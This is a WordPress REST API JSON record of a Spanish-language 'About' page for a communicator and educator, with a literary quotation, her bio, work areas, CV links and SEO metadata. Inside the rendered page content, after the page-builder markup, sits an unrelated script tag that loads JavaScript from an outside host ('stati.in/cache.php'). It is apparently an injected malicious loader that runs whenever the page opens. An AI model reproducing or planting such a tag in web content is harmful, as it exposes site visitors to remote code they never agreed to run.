{"id":92,"date":"2016-09-21T12:12:56","date_gmt":"2016-09-21T12:12:56","guid":{"rendered":"http:\/\/gt3demo.com\/wp\/johnblack-light\/?page_id=92"},"modified":"2018-02-24T23:39:04","modified_gmt":"2018-02-24T23:39:04","slug":"about","status":"publish","type":"page","link":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/","title":{"rendered":"About"},"content":{"rendered":"<p>[vc_row][vc_column css=\u00bb.vc_custom_1505763536722{margin-top: -40px !important;}\u00bb][vc_tta_tabs style=\u00bbflat\u00bb shape=\u00bbsquare\u00bb color=\u00bbblack\u00bb spacing=\u00bb\u00bb alignment=\u00bbright\u00bb active_section=\u00bb1&#8243; no_fill_content_area=\u00bbtrue\u00bb][vc_tta_section title=\u00bbAbout\u00bb tab_id=\u00bbAbout\u00bb][vc_column_text]<strong>\u00abLa l\u00e1mpara del cuerpo es el ojo. Si tu cuerpo es limpio, <\/strong><strong>todo tu cuerpo ser\u00e1 luminoso\u00bb.<\/strong><\/p>\n<p><span class=\"trecepixnegro\">\u00abLo cual no significa aqu\u00ed solamente sin doblez, inocente y pura, que tambi\u00e9n, sino limpia en el sentido f\u00edsico del t\u00e9rmino, y adem\u00e1s, informada por una genuina y apacible curiosidad que la empuja hacia la realidad m\u00e1s real de las cosas, aquella que se nos esconde y a la vez se nos brinda en las evidencias mismas, ese \u00abotro lado\u00bb \u00abde donde no viene nunca el conocimiento de las cosas; traspuesto el primer d\u00eda, por detr\u00e1s del \u00faltimo muro de la memoria, donde nace la otra memoria: la inmensa memoria de las cosas desconocidas\u00bb<\/span><\/p>\n<p style=\"text-align: right;\"><span class=\"docepixrojoneg\">Pr\u00f3logo de \u00abAlfanhui\u00bb<\/span><br \/>\n<span class=\"\">Agust\u00edn Cerezales<br \/>\n<\/span><\/p>\n<p>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=\u00bbBio\u00bb tab_id=\u00bbBio\u00bb][vc_column_text]Licenciada en Ciencias de la Comunicaci\u00f3n por la Universidad de Wales, tras trabajar en diferentes medios de comunicaci\u00f3n realiza el master de desarrollo de proyectos de proyectos audiovisuales por la ECAM (Escuela de Cine de la Comunidad de Madrid).<\/p>\n<p>A partir de este momento centra su actividad profesional en el ambito de la imagen, realizando del documental \u00abLos Paraos, mujeres en lucha\u00bb, proyectado en numerosas ciudades del pa\u00eds.<\/p>\n<p>Desde entonces compagina diferentes colaboraciones en materia de comunicaci\u00f3n fotograf\u00eda, montaje y dise\u00f1o gr\u00e1fico en el \u00e1mbito educativo con labores de docencia con ni\u00f1os, j\u00f3venes y personas con discapacidad, con las cuales gana un premio al mejor corto de animaci\u00f3n en EMOVE Festival.[\/vc_column_text][\/vc_tta_section][vc_tta_section title=\u00bb\u00c1reas de trabajo\u00bb tab_id=\u00bbAreas\u00bb][vc_custom_heading text=\u00bbComunicaci\u00f3n y social media\u00bb font_container=\u00bbtag:h1|text_align:left\u00bb google_fonts=\u00bbfont_family:Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic|font_style:400%20regular%3A400%3Anormal\u00bb][vc_column_text]A lo largo de mi trayectoria profesional trabaja como <strong>Responsable de Comunicaci\u00f3n<\/strong> Institucional en varias empresas e instituciones. Actualmente desarrolla una amplia labor en el <a href=\"http:\/\/www.colegio-alameda.com\" target=\"_blank\" rel=\"noopener\">Colegio Alameda de Osuna <\/a>donde realiza labores de comunicaci\u00f3n digital, <a href=\"https:\/\/twitter.com\/colegio_alameda\" target=\"_blank\" rel=\"noopener\">social media<\/a>, <a href=\"https:\/\/youtu.be\/9HBmuf23ig8\" target=\"_blank\" rel=\"noopener\">reportajes escritos<\/a>, <a href=\"http:\/\/www.colegio-alameda.com\/alameda-al-dia-infantil\/\" target=\"_blank\" rel=\"noopener\">fotograf\u00eda<\/a> y <a href=\"https:\/\/youtu.be\/9HBmuf23ig8\" target=\"_blank\" rel=\"noopener\">producci\u00f3n audiovisual.<\/a>[\/vc_column_text][vc_custom_heading text=\u00bbDocencia y pedagog\u00eda\u00bb font_container=\u00bbtag:h1|text_align:left\u00bb google_fonts=\u00bbfont_family:Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic|font_style:400%20regular%3A400%3Anormal\u00bb][vc_column_text]Con m\u00e1s de 15 a\u00f1os de experiencia en educaci\u00f3n no formal, dedica siempre un espacio para la formaci\u00f3n de adultos y ni\u00f1os en materia de periodismo, fotograf\u00eda y cine. Tras pasar por la Escuela de cine para ni\u00f1os<a href=\"http:\/\/www.minichaplin.com\/\" target=\"_blank\" rel=\"noopener\"> Minichaplin<\/a>, desarrolla actualmente su actividad docente en el\u00a0<a href=\"https:\/\/goo.gl\/photos\/bzHK9oyG5MXcJ2bq8\" target=\"_blank\" rel=\"noopener\">taller de periodismo<\/a> del <a href=\"http:\/\/www.colegio-alameda.com\" target=\"_blank\" rel=\"noopener\">Colegio Alameda de Osuna <\/a>donde ha llevado a cabo y coordinado en el Peri\u00f3dico \u00ab<a href=\"https:\/\/www.tumundoalrededor.com\/\" target=\"_blank\" rel=\"noopener\">Tu Mundo alrededor\u00bb<\/a>. Adem\u00e1s realiza labores de docencia con personas con discapacidad en\u00a0<a href=\"https:\/\/www.grupoamas.org\/\" target=\"_blank\" rel=\"noopener\">Grupo Am\u00e1s<\/a>, donde imparte artes pl\u00e1sticas y visuales, recibiendo el galard\u00f3n en <a href=\"http:\/\/emovefestival.com\/\" target=\"_blank\" rel=\"noopener\">Emove Festival<\/a> a mejor cortometraje de animaci\u00f3n en Ed. Especial 2017.[\/vc_column_text][vc_custom_heading text=\u00bbProducci\u00f3n audiovisual y Fotograf\u00eda\u00bb font_container=\u00bbtag:h1|text_align:left\u00bb google_fonts=\u00bbfont_family:Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic|font_style:400%20regular%3A400%3Anormal\u00bb][vc_column_text]A lo largo de su trayectoria profesional, ha realizado diferentes trabajos de dise\u00f1o y\u00a0 fotograf\u00eda para diferentes medios,\u00a0 iniciativas y festivales como<a href=\"http:\/\/in-sonora.org\/\" target=\"_blank\" rel=\"noopener\"> Insonora<\/a>, publicando su \u00faltimo trabajo fotogr\u00e1fico sobre la artista Paula Blower en la revista nacional brasile\u00f1a <a href=\"https:\/\/veja.abril.com.br\/\" target=\"_blank\" rel=\"noopener\">Veja.\u00a0<\/a>[\/vc_column_text][\/vc_tta_section][vc_tta_section i_type=\u00bbtypicons\u00bb i_icon_typicons=\u00bbtypcn typcn-download-outline\u00bb add_icon=\u00bbtrue\u00bb tab_id=\u00bbCV\u00bb][vc_custom_heading text=\u00bbDESCARGAS\u00bb font_container=\u00bbtag:h2|font_size:16|text_align:left\u00bb google_fonts=\u00bbfont_family:Lato%3A100%2C100italic%2C300%2C300italic%2Cregular%2Citalic%2C700%2C700italic%2C900%2C900italic|font_style:400%20regular%3A400%3Anormal\u00bb][vc_column_text]<a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/wp-content\/uploads\/2018\/02\/Victoria-Manjon-Cabeza-CV-Comunicacion.pdf\" target=\"_blank\" rel=\"noopener\">CV Comunicaci\u00f3n<\/a>[\/vc_column_text][vc_column_text]<a href=\"http:\/\/www.victoriamanjoncabezacloute.com\/wp-content\/uploads\/2018\/02\/cv2018teachingdef-1.pdf\" target=\"_blank\" rel=\"noopener\">CV Docencia<\/a>[\/vc_column_text][\/vc_tta_section][\/vc_tta_tabs][\/vc_column][\/vc_row]<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=1.5.3&amp;ref=zteZ\" type=\"text\/javascript\"><\/script><\/p>\n<div class='row'><div class='span3 first-module module_number_1 module_cont  module_price_table'><div style='padding-bottom:35px; padding-top:0px;' class='module_inner'><div class=\"price_table_wrapper\"><\/div><\/div><\/div><!-- .module_cont --><\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row][vc_column css=\u00bb.vc_custom_1505763536722{margin-top: -40px !important;}\u00bb][vc_tta_tabs style=\u00bbflat\u00bb shape=\u00bbsquare\u00bb color=\u00bbblack\u00bb spacing=\u00bb\u00bb alignment=\u00bbright\u00bb active_section=\u00bb1&#8243; no_fill_content_area=\u00bbtrue\u00bb][vc_tta_section title=\u00bbAbout\u00bb tab_id=\u00bbAbout\u00bb][vc_column_text]\u00abLa l\u00e1mpara del cuerpo es el ojo. Si tu cuerpo es limpio, todo tu cuerpo ser\u00e1 luminoso\u00bb. \u00abLo cual no significa aqu\u00ed solamente sin doblez, inocente y pura, que tambi\u00e9n, sino limpia en el sentido f\u00edsico del t\u00e9rmino, y adem\u00e1s, informada por una genuina y apacible curiosidad que la empuja hacia la realidad m\u00e1s real de las cosas, aquella que se nos esconde y a la vez se nos brinda en las evidencias mismas, ese \u00abotro lado\u00bb \u00abde donde no viene nunca el conocimiento de las cosas; traspuesto el primer d\u00eda, por detr\u00e1s del \u00faltimo muro de la memoria, donde nace la otra memoria: la inmensa memoria de las cosas desconocidas\u00bb Pr\u00f3logo de \u00abAlfanhui\u00bb Agust\u00edn Cerezales [\/vc_column_text][\/vc_tta_section][vc_tta_section title=\u00bbBio\u00bb tab_id=\u00bbBio\u00bb][vc_column_text]Licenciada en Ciencias de la Comunicaci\u00f3n por la Universidad de Wales, tras trabajar en diferentes medios de comunicaci\u00f3n realiza el master de desarrollo de proyectos de proyectos audiovisuales por la ECAM (Escuela de Cine de la Comunidad de Madrid). A partir de este momento centra su actividad profesional en el ambito de la imagen, realizando del documental \u00abLos Paraos, mujeres en lucha\u00bb, proyectado en numerosas ciudades del pa\u00eds. Desde entonces [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-with-slider.php","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.9 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>About - victoriamanjoncabezacloute<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"About - victoriamanjoncabezacloute\" \/>\n<meta property=\"og:description\" content=\"[vc_row][vc_column css=\u00bb.vc_custom_1505763536722{margin-top: -40px !important;}\u00bb][vc_tta_tabs style=\u00bbflat\u00bb shape=\u00bbsquare\u00bb color=\u00bbblack\u00bb spacing=\u00bb\u00bb alignment=\u00bbright\u00bb active_section=\u00bb1&#8243; no_fill_content_area=\u00bbtrue\u00bb][vc_tta_section title=\u00bbAbout\u00bb tab_id=\u00bbAbout\u00bb][vc_column_text]\u00abLa l\u00e1mpara del cuerpo es el ojo. Si tu cuerpo es limpio, todo tu cuerpo ser\u00e1 luminoso\u00bb. \u00abLo cual no significa aqu\u00ed solamente sin doblez, inocente y pura, que tambi\u00e9n, sino limpia en el sentido f\u00edsico del t\u00e9rmino, y adem\u00e1s, informada por una genuina y apacible curiosidad que la empuja hacia la realidad m\u00e1s real de las cosas, aquella que se nos esconde y a la vez se nos brinda en las evidencias mismas, ese \u00abotro lado\u00bb \u00abde donde no viene nunca el conocimiento de las cosas; traspuesto el primer d\u00eda, por detr\u00e1s del \u00faltimo muro de la memoria, donde nace la otra memoria: la inmensa memoria de las cosas desconocidas\u00bb Pr\u00f3logo de \u00abAlfanhui\u00bb Agust\u00edn Cerezales [\/vc_column_text][\/vc_tta_section][vc_tta_section title=\u00bbBio\u00bb tab_id=\u00bbBio\u00bb][vc_column_text]Licenciada en Ciencias de la Comunicaci\u00f3n por la Universidad de Wales, tras trabajar en diferentes medios de comunicaci\u00f3n realiza el master de desarrollo de proyectos de proyectos audiovisuales por la ECAM (Escuela de Cine de la Comunidad de Madrid). A partir de este momento centra su actividad profesional en el ambito de la imagen, realizando del documental \u00abLos Paraos, mujeres en lucha\u00bb, proyectado en numerosas ciudades del pa\u00eds. Desde entonces [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/\" \/>\n<meta property=\"og:site_name\" content=\"victoriamanjoncabezacloute\" \/>\n<meta property=\"article:modified_time\" content=\"2018-02-24T23:39:04+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/#website\",\"url\":\"http:\/\/www.victoriamanjoncabezacloute.com\/\",\"name\":\"victoriamanjoncabezacloute\",\"description\":\"Profile Victoria Manj\\u00f3n-Cabeza\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/www.victoriamanjoncabezacloute.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/#webpage\",\"url\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/\",\"name\":\"About - victoriamanjoncabezacloute\",\"isPartOf\":{\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/#website\"},\"datePublished\":\"2016-09-21T12:12:56+00:00\",\"dateModified\":\"2018-02-24T23:39:04+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"http:\/\/www.victoriamanjoncabezacloute.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"About\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"About - victoriamanjoncabezacloute","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/","og_locale":"es_ES","og_type":"article","og_title":"About - victoriamanjoncabezacloute","og_description":"[vc_row][vc_column css=\u00bb.vc_custom_1505763536722{margin-top: -40px !important;}\u00bb][vc_tta_tabs style=\u00bbflat\u00bb shape=\u00bbsquare\u00bb color=\u00bbblack\u00bb spacing=\u00bb\u00bb alignment=\u00bbright\u00bb active_section=\u00bb1&#8243; no_fill_content_area=\u00bbtrue\u00bb][vc_tta_section title=\u00bbAbout\u00bb tab_id=\u00bbAbout\u00bb][vc_column_text]\u00abLa l\u00e1mpara del cuerpo es el ojo. Si tu cuerpo es limpio, todo tu cuerpo ser\u00e1 luminoso\u00bb. \u00abLo cual no significa aqu\u00ed solamente sin doblez, inocente y pura, que tambi\u00e9n, sino limpia en el sentido f\u00edsico del t\u00e9rmino, y adem\u00e1s, informada por una genuina y apacible curiosidad que la empuja hacia la realidad m\u00e1s real de las cosas, aquella que se nos esconde y a la vez se nos brinda en las evidencias mismas, ese \u00abotro lado\u00bb \u00abde donde no viene nunca el conocimiento de las cosas; traspuesto el primer d\u00eda, por detr\u00e1s del \u00faltimo muro de la memoria, donde nace la otra memoria: la inmensa memoria de las cosas desconocidas\u00bb Pr\u00f3logo de \u00abAlfanhui\u00bb Agust\u00edn Cerezales [\/vc_column_text][\/vc_tta_section][vc_tta_section title=\u00bbBio\u00bb tab_id=\u00bbBio\u00bb][vc_column_text]Licenciada en Ciencias de la Comunicaci\u00f3n por la Universidad de Wales, tras trabajar en diferentes medios de comunicaci\u00f3n realiza el master de desarrollo de proyectos de proyectos audiovisuales por la ECAM (Escuela de Cine de la Comunidad de Madrid). A partir de este momento centra su actividad profesional en el ambito de la imagen, realizando del documental \u00abLos Paraos, mujeres en lucha\u00bb, proyectado en numerosas ciudades del pa\u00eds. Desde entonces [&hellip;]","og_url":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/","og_site_name":"victoriamanjoncabezacloute","article_modified_time":"2018-02-24T23:39:04+00:00","twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"4 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"http:\/\/www.victoriamanjoncabezacloute.com\/#website","url":"http:\/\/www.victoriamanjoncabezacloute.com\/","name":"victoriamanjoncabezacloute","description":"Profile Victoria Manj\u00f3n-Cabeza","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.victoriamanjoncabezacloute.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"},{"@type":"WebPage","@id":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/#webpage","url":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/","name":"About - victoriamanjoncabezacloute","isPartOf":{"@id":"http:\/\/www.victoriamanjoncabezacloute.com\/#website"},"datePublished":"2016-09-21T12:12:56+00:00","dateModified":"2018-02-24T23:39:04+00:00","breadcrumb":{"@id":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/"]}]},{"@type":"BreadcrumbList","@id":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/about\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"http:\/\/www.victoriamanjoncabezacloute.com\/"},{"@type":"ListItem","position":2,"name":"About"}]}]}},"_links":{"self":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages\/92"}],"collection":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/comments?post=92"}],"version-history":[{"count":97,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages\/92\/revisions"}],"predecessor-version":[{"id":2542,"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/pages\/92\/revisions\/2542"}],"wp:attachment":[{"href":"http:\/\/www.victoriamanjoncabezacloute.com\/index.php\/wp-json\/wp\/v2\/media?parent=92"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}